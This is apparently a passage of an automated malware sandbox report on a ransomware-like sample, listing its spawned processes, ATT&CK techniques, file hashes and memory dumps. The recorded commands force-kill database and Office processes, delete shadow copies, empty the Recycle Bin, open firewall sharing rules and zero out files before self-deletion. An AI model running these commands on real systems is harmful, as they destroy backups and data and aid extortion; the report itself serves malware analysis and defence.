C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3520

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:1008

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3208

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ragent.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rmngr.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rphost.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3132

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM 1cv8.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3000

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:816

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:3580

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:3128

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:916

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
2⤵
PID:1552

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:604

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:3680

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:1192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
2⤵
PID:2776

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:3860

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\Инструкция.txt
MD5
0de8310ecc6e7e0793cab8357e98e823

SHA1
f93ee3bd5ec1170068a11a83a96d19dcf6e1d068

SHA256
74dc43243f8d53d043fc9390f23a1008316f6c0b257a6fc2d0b41022814a962c

SHA512
dc81bc2faeb9cb7a260ba3fef5cbc5a7517f1390e841f196ec5e10e446b31f10bb0be9cf94a0423228a0b7ddf124b41e12549592fb6761dfc4da424ee6450ca4

Download Submit
memory/208-127-0x0000000000000000-mapping.dmp

Download
memory/376-128-0x0000000000000000-mapping.dmp

Download
memory/504-131-0x0000000000000000-mapping.dmp

Download
memory/516-118-0x0000000000000000-mapping.dmp

Download
memory/608-164-0x0000000000000000-mapping.dmp

Download
memory/676-163-0x0000000000000000-mapping.dmp

Download
memory/720-129-0x0000000000000000-mapping.dmp

Download
memory/732-125-0x0000000000000000-mapping.dmp

Download
memory/872-177-0x0000000000000000-mapping.dmp

Download
memory/892-166-0x0000000000000000-mapping.dmp

Download
memory/956-151-0x0000000000000000-mapping.dmp

Download
memory/968-154-0x0000000000000000-mapping.dmp

Download
memory/1008-175-0x0000000000000000-mapping.dmp

Download
memory/1012-159-0x0000000000000000-mapping.dmp

Download
memory/1040-138-0x0000000000000000-mapping.dmp

Download
memory/1056-132-0x0000000000000000-mapping.dmp

Download
memory/1136-148-0x0000000000000000-mapping.dmp

Download
memory/1160-134-0x0000000000000000-mapping.dmp

Download
memory/1240-142-0x0000000000000000-mapping.dmp

Download
memory/1332-179-0x0000000000000000-mapping.dmp

Download
memory/1436-158-0x0000000000000000-mapping.dmp

Download
memory/1552-182-0x0000000000000000-mapping.dmp

Download
memory/1680-170-0x0000000000000000-mapping.dmp

Download
memory/1752-169-0x0000000000000000-mapping.dmp

Download
memory/1796-171-0x0000000000000000-mapping.dmp

Download
memory/1796-152-0x0000000000000000-mapping.dmp

Download
memory/1988-120-0x0000000000000000-mapping.dmp

Download
memory/2124-136-0x0000000000000000-mapping.dmp

Download
memory/2196-160-0x0000000000000000-mapping.dmp

Download
memory/2224-122-0x0000000000000000-mapping.dmp

Download
memory/2224-167-0x0000000000000000-mapping.dmp

Download
memory/2244-133-0x0000000000000000-mapping.dmp

Download
memory/2280-124-0x0000000000000000-mapping.dmp

Download
memory/2312-153-0x0000000000000000-mapping.dmp

Download
memory/2404-145-0x0000000000000000-mapping.dmp

Download
memory/2440-130-0x0000000000000000-mapping.dmp

Download
memory/2636-210-0x0000000009400000-0x0000000009401000-memory.dmp

Filesize
4KB

Download
memory/2636-209-0x000000000AB20000-0x000000000AB21000-memory.dmp

Filesize
4KB

Download
memory/2636-115-0x0000000000290000-0x0000000000291000-memory.dmp

Filesize
4KB

Download
memory/2636-119-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/2636-117-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2872-178-0x0000000000000000-mapping.dmp

Download
memory/2876-181-0x0000000000000000-mapping.dmp

Download
memory/2888-126-0x0000000000000000-mapping.dmp

Download
memory/2964-192-0x0000000007072000-0x0000000007073000-memory.dmp

Filesize
4KB

Download
memory/2964-190-0x0000000007EC0000-0x0000000007EC1000-memory.dmp

Filesize
4KB

Download
memory/2964-187-0x0000000007580000-0x0000000007581000-memory.dmp

Filesize
4KB

Download
memory/2964-185-0x0000000004B00000-0x0000000004B01000-memory.dmp

Filesize
4KB

Download
memory/2964-183-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-208-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-207-0x0000000007074000-0x0000000007076000-memory.dmp

Filesize
8KB

Download
memory/2964-184-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-206-0x0000000007073000-0x0000000007074000-memory.dmp

Filesize
4KB

Download
memory/2964-196-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2964-195-0x00000000085F0000-0x00000000085F1000-memory.dmp

Filesize
4KB

Download
memory/2964-194-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/2964-188-0x0000000007620000-0x0000000007621000-memory.dmp

Filesize
4KB

Download
memory/2964-186-0x00000000076B0000-0x00000000076B1000-memory.dmp

Filesize
4KB

Download
memory/2964-191-0x0000000007070000-0x0000000007071000-memory.dmp

Filesize
4KB

Download
memory/2964-193-0x0000000008210000-0x0000000008211000-memory.dmp

Filesize
4KB

Download
memory/2996-173-0x0000000000000000-mapping.dmp

Download
memory/3092-121-0x0000000000000000-mapping.dmp

Download
memory/3188-141-0x0000000000000000-mapping.dmp

Download
memory/3208-176-0x0000000000000000-mapping.dmp

Download
memory/3264-139-0x0000000000000000-mapping.dmp

Download
memory/3320-165-0x0000000000000000-mapping.dmp

Download
memory/3400-156-0x0000000000000000-mapping.dmp

Download
memory/3448-157-0x0000000000000000-mapping.dmp

Download
memory/3464-168-0x0000000000000000-mapping.dmp

Download
memory/3488-123-0x0000000000000000-mapping.dmp

Download
memory/3520-174-0x0000000000000000-mapping.dmp

Download
memory/3580-162-0x0000000000000000-mapping.dmp

Download
memory/3608-137-0x0000000000000000-mapping.dmp

Download
memory/3656-172-0x0000000000000000-mapping.dmp

Download
memory/3660-144-0x0000000000000000-mapping.dmp

Download
memory/3688-150-0x0000000000000000-mapping.dmp

Download
memory/3780-180-0x0000000000000000-mapping.dmp

Download
memory/3820-161-0x0000000000000000-mapping.dmp

Download
memory/3864-143-0x0000000000000000-mapping.dmp

Download
memory/3892-155-0x0000000000000000-mapping.dmp

Download
memory/3920-140-0x0000000000000000-mapping.dmp

Download
memory/3936-147-0x0000000000000000-mapping.dmp

Download
memory/3956-146-0x0000000000000000-mapping.dmp

Download
memory/4032-135-0x0000000000000000-mapping.dmp

Download
memory/4088-149-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads